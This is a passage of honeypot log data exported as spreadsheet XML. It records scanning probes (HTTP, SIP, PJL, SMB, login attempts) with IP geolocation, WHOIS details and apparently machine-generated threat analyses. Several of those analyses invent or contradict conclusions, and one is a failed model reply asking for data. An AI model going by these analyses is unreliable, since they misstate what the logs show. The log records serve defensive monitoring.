    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.233.76.135:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=59601'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.143,48486)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.180.55.39:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.37.11:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.143,35298)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (PDrpwaRl,)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.234.67.80:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=41652'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.116.162:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=49510'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=47396'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d8f</t>
  </si>
  <si>
    <t>There is no data provided for analysis. &amp;&amp; Attempt to connect to PostgreSQL service, possibly for malicious database access or unauthorized account creation. The lack of 'NA' indicates this was attempted successfully within the honeypot. This may be indicative of an attacker probing for vulnerabilities.</t>
  </si>
  <si>
    <t>ef9154ca5f03cd5809131fe4cfc643f6</t>
  </si>
  <si>
    <t>46.236.65.74</t>
  </si>
  <si>
    <t>h46-236-65-74.cust.bredband2.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>80&amp;&amp;23</t>
  </si>
  <si>
    <t>100 04</t>
  </si>
  <si>
    <t>59.3293</t>
  </si>
  <si>
    <t>18.0686</t>
  </si>
  <si>
    <t>29518</t>
  </si>
  <si>
    <t>Bredband2 AB</t>
  </si>
  <si>
    <t>Bredband2</t>
  </si>
  <si>
    <t>2010-12-21</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>2002-06-26 16:35:31</t>
  </si>
  <si>
    <t>2025-06-26 16:40:48</t>
  </si>
  <si>
    <t>2024-05-28 06:07:18</t>
  </si>
  <si>
    <t>['LEE.NS.CLOUDFLARE.COM', 'OLGA.NS.CLOUDFLARE.COM']</t>
  </si>
  <si>
    <t>Name SRS AB</t>
  </si>
  <si>
    <t>Protected Protected</t>
  </si>
  <si>
    <t>['abuse@namesrs.com', 'bredband2.com@shieldwhois.com']</t>
  </si>
  <si>
    <t>Radiovägen 2</t>
  </si>
  <si>
    <t>::ffff:2eec:414a</t>
  </si>
  <si>
    <t>No activity reported for Telnet service, possibly due to lack of connection attempts or no malicious activity detected. 
Telnet service has been idle or unutilized at the time of logging.
 No suspicious activity is associated with this log entry.</t>
  </si>
  <si>
    <t>3e7ff0fc8cfa4e708ca78f288fde11bd</t>
  </si>
  <si>
    <t>51.252.136.71</t>
  </si>
  <si>
    <t>Saudi Arabia</t>
  </si>
  <si>
    <t>Riyadh Region</t>
  </si>
  <si>
    <t>Riyadh</t>
  </si>
  <si>
    <t>108410</t>
  </si>
  <si>
    <t>24.6877</t>
  </si>
  <si>
    <t>46.7219</t>
  </si>
  <si>
    <t>39891</t>
  </si>
  <si>
    <t>ALJAWWALSTC-AS</t>
  </si>
  <si>
    <t>Saudinet</t>
  </si>
  <si>
    <t>::ffff:33fc:8847</t>
  </si>
  <si>
    <t>Possible attempt to log into a website using an automated browser profile likely generated from stolen credentials. The browser type and version are fake, but the Android device information is legitimate, indicating a potential phishing or credential stuffing attack. &amp;&amp; A login attempt is being made using an HTTP request with a suspicious browser fingerprint. The browser information matches Mozilla Firefox's user agent but may be spoofed to evade detection. This could be an automated bot attempting to gain unauthorized access.</t>
  </si>
  <si>
    <t>1923b3f1f68d898fc47a7462ed8097ec</t>
  </si>
  <si>
    <t>51.252.181.120</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Brute Force&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1</t>
  </si>
  <si>
    <t>26855&amp;&amp;443</t>
  </si>
  <si>
    <t>Saudi Telecom Company JSC</t>
  </si>
  <si>
    <t>1993-09-01</t>
  </si>
  <si>
    <t>NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:33fc:b578</t>
  </si>
  <si>
    <t>ab4266c182b5c251787ae988b93ff62c</t>
  </si>
  <si>
    <t>117.214.75.100</t>
  </si>
  <si>
    <t>::ffff:75d6:4b64</t>
  </si>
  <si>
    <t>75ead40dfb00e92dd3a4783637634de2</t>
  </si>
  <si>
    <t>18.97.5.39</t>
  </si>
  <si>
    <t>ec2-18-97-5-39.compute-1.amazonaws.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Credential Stuffing</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_POSTGRES_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;61286&amp;&amp;23&amp;&amp;389&amp;&amp;443&amp;&amp;3306&amp;&amp;5432&amp;&amp;1521&amp;&amp;21&amp;&amp;6379&amp;&amp;3389&amp;&amp;25</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;login&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3079.53 Safari/537.32', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'None'}}</t>
  </si>
  <si>
    <t>MarkMonitor, Inc.</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)', 'clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)', 'clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)', 'serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)', 'serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)', 'serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)']</t>
  </si>
  <si>
    <t>Legal Department</t>
  </si>
  <si>
    <t>['abusecomplaints@markmonitor.com', 'hostmaster@amazon.com', 'whoisrequest@markmonitor.com']</t>
  </si>
  <si>
    <t>PO BOX 81226</t>
  </si>
  <si>
    <t>::ffff:1261:527</t>
  </si>
  <si>
    <t>This suggests an unsuccessful attempt to exploit a database vulnerability, likely targeting the Oracle service. The fact that it's marked as "Not Available" implies the attack was unsuccessful or the target is not accessible. It may be an automated scanning activity trying to identify vulnerabilities.</t>
  </si>
  <si>
    <t>30fe11ce9b71d0a82f9cbe79c74bdb8c</t>
  </si>
  <si>
    <t>37.19.200.164</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H15</t>
  </si>
  <si>
    <t>212238</t>
  </si>
  <si>
    <t>Datacamp Limited</t>
  </si>
  <si>
    <t>Cdnext DAL</t>
  </si>
  <si>
    <t>::ffff:2513:c8a4</t>
  </si>
  <si>
    <t>This data indicates an attempt to access MySQL service without providing any credentials, which may be a scanning activity for potential SQL injection vulnerabilities. The lack of valid credentials suggests the attacker is trying to exploit weaknesses. This behavior could be indicative of reconnaissance efforts. &amp;&amp; The data indicates an attempt to exploit a vulnerability in a MySQL database service, likely by a malicious user trying to gain unauthorized access or extract sensitive information from the system is accessing and is attempting to query or access resources it does not have access to. This could be related to SQL injection attack attempts.</t>
  </si>
  <si>
    <t>c2abc97e2ef064212cd96f6421822436</t>
  </si>
  <si>
    <t>117.241.176.154</t>
  </si>
  <si>
    <t>::ffff:75f1:b09a</t>
  </si>
  <si>
    <t>No malicious activity detected, service is inactive or unavailable for TELNET connection attempts. &amp;&amp; No activity detected in TELNET service. Service is inactive or unresponsive. No suspicious connection attempts were made to this service.</t>
  </si>
  <si>
    <t>5ebb249494d3da08e51093d9a0fd16dd</t>
  </si>
  <si>
    <t>106.70.170.64</t>
  </si>
  <si>
    <t>n106-70-170-64.sun21.vic.optusnet.com.au</t>
  </si>
  <si>
    <t>City of Brimbank</t>
  </si>
  <si>
    <t>Sunshine West</t>
  </si>
  <si>
    <t>9972578</t>
  </si>
  <si>
    <t>3020</t>
  </si>
  <si>
    <t>-37.7947</t>
  </si>
  <si>
    <t>144.819</t>
  </si>
  <si>
    <t>4804</t>
  </si>
  <si>
    <t>MPX-AS</t>
  </si>
  <si>
    <t>SingTel Optus Pty Ltd</t>
  </si>
  <si>
    <t>Optus Internet Pty Ltd</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36}</t>
  </si>
  <si>
    <t>2024-08-13 05:03:35</t>
  </si>
  <si>
    <t>['ns2.optusnet.com.au', 'ns1.optusnet.com.au']</t>
  </si>
  <si>
    <t>Corporation Service Company (Aust) Pty Ltd</t>
  </si>
  <si>
    <t>['serverDeleteProhibited https://identitydigital.au/get-au/whois-status-codes#serverDeleteProhibited', 'serverRenewProhibited https://identitydigital.au/get-au/whois-status-codes#serverRenewProhibited', 'serverTransferProhibited https://identitydigital.au/get-au/whois-status-codes#serverTransferProhibited', 'serverUpdateProhibited https://identitydigital.au/get-au/whois-status-codes#serverUpdateProhibited']</t>
  </si>
  <si>
    <t>::ffff:6a46:aa40</t>
  </si>
  <si>
    <t>An unknown user is attempting to log in using a web service from an IP likely associated with MacOS, possibly using Google Chrome version 134. &amp;&amp; An unknown client is attempting to access a website's login page using Google Chrome on a Mac with a suspiciously high browser version. This could be a malicious bot or script trying to gain unauthorized access. The client's user agent string suggests a fake or outdated browser version, raising suspicions about the legitimacy of this activity.</t>
  </si>
  <si>
    <t>5fa40ad7c3660d8efcfd057845176dd1</t>
  </si>
  <si>
    <t>117.223.92.19</t>
  </si>
  <si>
    <t>::ffff:75df:5c13</t>
  </si>
  <si>
    <t>There is no log activity detected for this service. This could be due to the service being inactive or the lack of any malicious attempts. No suspicious connections were made. &amp;&amp; No activity detected in the telnet service, suggesting that potential attackers were likely scanning or probing for vulnerabilities. This could be an initial reconnaissance step before launching a more targeted attack. The lack of activity may indicate that the scan was blocked or the attacker moved on.</t>
  </si>
  <si>
    <t>51e6b590a5be48accfd1382c68fc2259</t>
  </si>
  <si>
    <t>101.109.126.33</t>
  </si>
  <si>
    <t>Phaya Thai</t>
  </si>
  <si>
    <t>7026870</t>
  </si>
  <si>
    <t>13.7801</t>
  </si>
  <si>
    <t>::ffff:656d:7e21</t>
  </si>
  <si>
    <t>No suspicious activity detected for Telnet service, as there is no established connection or login attempt. Data for this service is unknown or unavailable. No malicious behavior recorded. &amp;&amp; No TELNET activity detected, but possibly attempted or monitored. The absence of data suggests either no interaction or an unsuccessful connection attempt. The presence is considered NA which might indicate unknown or not applicable status.</t>
  </si>
  <si>
    <t>631a94b440777b4e76a5533dca6b5c28</t>
  </si>
  <si>
    <t>115.97.114.37</t>
  </si>
  <si>
    <t>::ffff:7361:7225</t>
  </si>
  <si>
    <t>54a3d070b81395cb91293fbea174b6ac</t>
  </si>
  <si>
    <t>103.68.176.236</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>Ranga Reddy</t>
  </si>
  <si>
    <t>Chevella</t>
  </si>
  <si>
    <t>1445121</t>
  </si>
  <si>
    <t>501503</t>
  </si>
  <si>
    <t>17.3135</t>
  </si>
  <si>
    <t>78.1388</t>
  </si>
  <si>
    <t>149422</t>
  </si>
  <si>
    <t>VYBETELECOM</t>
  </si>
  <si>
    <t>Inet Fiber PVT LTD</t>
  </si>
  <si>
    <t>2016-07-06</t>
  </si>
  <si>
    <t>INETFIB</t>
  </si>
  <si>
    <t>::ffff:6744:b0ec</t>
  </si>
  <si>
    <t>f0b9980d4223d8513d7a49b2fc0dcebe</t>
  </si>
  <si>
    <t>59.178.235.102</t>
  </si>
  <si>
    <t>::ffff:3bb2:eb66</t>
  </si>
  <si>
    <t>Possible SQL injection attempt, as MSSQL service is being accessed without credentials or authentication information provided. This could be an attempt to exploit vulnerability or extract sensitive data. Unauthorized access attempt detected for MSSQL database management system. &amp;&amp; Possible attempts to access Microsoft SQL Server databases without permission, potentially leading to unauthorized access or data theft. The activity suggests an attempt to exploit the database system for malicious purposes. No authentication information is provided, indicating a potential vulnerability or brute-force attack.</t>
  </si>
  <si>
    <t>3768d74472f5f0b75412c59cb1c21389</t>
  </si>
  <si>
    <t>122.252.231.173</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;53&amp;&amp;21507&amp;&amp;3306&amp;&amp;445&amp;&amp;57445</t>
  </si>
  <si>
    <t>Ramanagara</t>
  </si>
  <si>
    <t>Closepet</t>
  </si>
  <si>
    <t>1258744</t>
  </si>
  <si>
    <t>12.7402</t>
  </si>
  <si>
    <t>77.3864</t>
  </si>
  <si>
    <t>RailTel Corporation Of India Ltd.</t>
  </si>
  <si>
    <t>M/s Namdhari Seeds Pvt Ltd.</t>
  </si>
  <si>
    <t>2006-11-16</t>
  </si>
  <si>
    <t>Namdhari-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,54888)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,55896)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,52605)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,62761)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,63488)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,62845)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,63969)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,49736)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,50382)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:7afc:e7ad</t>
  </si>
  <si>
    <t>An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources or data exfiltration attempts.
This could be an indication of malware spreading or lateral movement within a network.
Further investigation is necessary to determine the intentions and impact of this activity. &amp;&amp; A potentially malicious device from IP address 122.252.231.173 is attempting to initiate an SMB connection.
This could be an attempt to access sensitive files or exploit vulnerabilities on the targeted system.
It may also indicate a brute-force attack or unauthorized access attempt. &amp;&amp; A user has authenticated to an SMB service using basic credentials, indicating possible unauthorized access attempt or brute force attack. This may be an indication of malicious activity, such as attempted unauthorized file access or data theft. It could also indicate a vulnerability in the system's authentication mechanism. &amp;&amp; Possible malicious activity detected: User attempted to authenticate with administrative privileges via SMB using basic authentication credentials. This may indicate an attempt to gain unauthorized access to the system or exploit vulnerabilities. The user's name is hidden behind a dot notation, which could be an evasion technique. &amp;&amp; MySQL database connection attempt failed, possibly due to authentication issues or service unavailability.
The connection attempt may be a reconnaissance probe by an attacker.
This could be a precursor to further malicious activity such as SQL injection attacks. &amp;&amp; An unknown entity is attempting to connect to MySQL database services, indicating possible database scanning or unauthorized access attempts. This activity suggests an attempt to exploit vulnerabilities or gain unauthorized access. The outcome of this attempt is unclear due to lack of further information in the log entry.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; SMB Attack</t>
  </si>
  <si>
    <t>b4ca739c076bed694ff1e77ac9fec5c6</t>
  </si>
  <si>
    <t>198.44.129.83</t>
  </si>
  <si>
    <t>Riaan Aspeling</t>
  </si>
  <si>
    <t>::ffff:c62c:8153</t>
  </si>
  <si>
    <t>d9e7a6c69449d0d4c8e46db2b15385a6</t>
  </si>
  <si>
    <t>58.178.32.93</t>
  </si>
  <si>
    <t>58-178-32-93.dyn.dodo.net.au</t>
  </si>
  <si>
    <t>NSW</t>
  </si>
  <si>
    <t>New South Wales</t>
  </si>
  <si>
    <t>North Sydney Council</t>
  </si>
  <si>
    <t>North Sydney</t>
  </si>
  <si>
    <t>2154855</t>
  </si>
  <si>
    <t>2055</t>
  </si>
  <si>
    <t>-33.8392</t>
  </si>
  <si>
    <t>151.207</t>
  </si>
  <si>
    <t>VOCUS-RETAIL-AU</t>
  </si>
  <si>
    <t>2025-03-27 14:17:02</t>
  </si>
  <si>
    <t>['dns1.dodo.com.au', 'dns2.dodo.com.au']</t>
  </si>
  <si>
    <t>Domain Directors Pty Ltd trading as Instra</t>
  </si>
  <si>
    <t>serverRenewProhibited https://identitydigital.au/get-au/whois-status-codes#serverRenewProhibited</t>
  </si>
  <si>
    <t>::ffff:3ab2:205d</t>
  </si>
  <si>
    <t>A user attempted to log in using an HTTP request with a suspicious browser fingerprint, possibly indicating credential stuffing or brute-force login attempts from an automated tool. The browser identification suggests a fake or spoofed user agent. This could be part of a larger phishing or account compromise campaign. &amp;&amp; A malicious login attempt has been detected from a Windows machine using Google Chrome browser with an outdated version of the browser. The version 135 is suspiciously low and possibly indicates a fake or compromised system. This could be a sign of automated bot activity trying to gain unauthorized access.</t>
  </si>
  <si>
    <t>60d4a27f8d35edc1d02bff0de3c5ebc6</t>
  </si>
  <si>
    <t>223.18.216.156</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>NKT</t>
  </si>
  <si>
    <t>Kwai Tsing</t>
  </si>
  <si>
    <t>Tsing Yi Town</t>
  </si>
  <si>
    <t>1818483</t>
  </si>
  <si>
    <t>22.3484</t>
  </si>
  <si>
    <t>114.112</t>
  </si>
  <si>
    <t>9304</t>
  </si>
  <si>
    <t>HGC Global Communications Limited</t>
  </si>
  <si>
    <t>2010-08-05</t>
  </si>
  <si>
    <t>HGCGLOBAL-HK</t>
  </si>
  <si>
    <t>::ffff:df12:d89c</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze activity. &amp;&amp; No malicious activity detected for TELNET service, as "NA" indicates no attempts or connections made. No unusual behavior or login attempts were recorded. The log simply shows that the service is inactive or idle.</t>
  </si>
  <si>
    <t>I need log data to analyze the attacks! Please provide it, and I'll be happy to assist. 
(Once you provide the log data, I'll come up with a list of attack names in a short phrase each.)</t>
  </si>
  <si>
    <t>7f5a88396bf666cb249abf7eb7a15c34</t>
  </si>
  <si>
    <t>94.154.35.122</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>5900&amp;&amp;389&amp;&amp;3389&amp;&amp;NA</t>
  </si>
  <si>
    <t>Individual entrepreneur Dyachenko Valentina Ivanovna</t>
  </si>
  <si>
    <t>{Data_VNC:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:5e9a:237a</t>
  </si>
  <si>
    <t>No log data is available, so there's nothing to analyze or report on possible malicious activity.</t>
  </si>
  <si>
    <t>7161f662add175d95da9246ba569d191</t>
  </si>
  <si>
    <t>128.14.65.211</t>
  </si>
  <si>
    <t>ZEN-ECN</t>
  </si>
  <si>
    <t>Zenla</t>
  </si>
  <si>
    <t>::ffff:800e:41d3</t>
  </si>
  <si>
    <t>A user attempted to log into a service using a fake browser signature, likely attempting to remain anonymous or evade detection. The browser and operating system details appear to be fabricated. This suggests an attempt at spoofing legitimate traffic. &amp;&amp; An unknown device attempted to access a login page for an HTTP service. The device is likely using a fake or spoofed user agent to conceal its identity. It claims to be running Android 10 on a Linux-based system. &amp;&amp; An attempt to login to a web service using an Android device with a suspiciously outdated browser version, possibly indicating malware or phishing activity. The user agent string is fake, suggesting automated or scripted behavior. This could be a malicious actor trying to access unauthorized accounts.</t>
  </si>
  <si>
    <t>10297463fc38099621bfdff65714af9c</t>
  </si>
  <si>
    <t>118.45.220.140</t>
  </si>
  <si>
    <t>Gyeongsangbuk-do</t>
  </si>
  <si>
    <t>Gyeongsan-si</t>
  </si>
  <si>
    <t>Gyeongsan-si (Hayang-eup)</t>
  </si>
  <si>
    <t>1841598</t>
  </si>
  <si>
    <t>35.9132</t>
  </si>
  <si>
    <t>128.819</t>
  </si>
  <si>
    <t>::ffff:762d:dc8c</t>
  </si>
  <si>
    <t>No login attempt was made over this service, as the status is still set to 'Not Applicable'. &amp;&amp; No malicious activity detected, as TELNET service is not active or has no connection attempts made. 
There are no incoming or outgoing connections to the TELNET service recorded. 
No related activity found in the log data for this particular service.</t>
  </si>
  <si>
    <t>Port Scanning</t>
  </si>
  <si>
    <t>4e0bbc75a7f2d045734ae45d66ed0ed5</t>
  </si>
  <si>
    <t>84.240.246.50</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MSSQL_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;22&amp;&amp;12089&amp;&amp;NA</t>
  </si>
  <si>
    <t>Zhezuniverbaikonurova</t>
  </si>
  <si>
    <t>2004-06-07</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,55828)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,55905)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,60585)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,60660)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,52018)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,52103)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,61383)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,61559)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,56369)}</t>
  </si>
  <si>
    <t>::ffff:54f0:f632</t>
  </si>
  <si>
    <t>There is insufficient information to determine any malicious activity. The log data appears to be incomplete or missing. This makes it impossible to analyze for potential security threats. &amp;&amp; An unknown client attempted to establish a connection from IP address 84.240.246.50 using an unusual port number 56369, which could be indicative of malicious scanning or probing activity. This may be an attempt to exploit vulnerabilities in the system or gain unauthorized access. The use of a high-numbered port is often associated with malicious intent.</t>
  </si>
  <si>
    <t>SMB Scan</t>
  </si>
  <si>
    <t>85b4f7a56ec8ebb925792d5c84028105</t>
  </si>
  <si>
    <t>78.137.5.20</t>
  </si>
  <si>
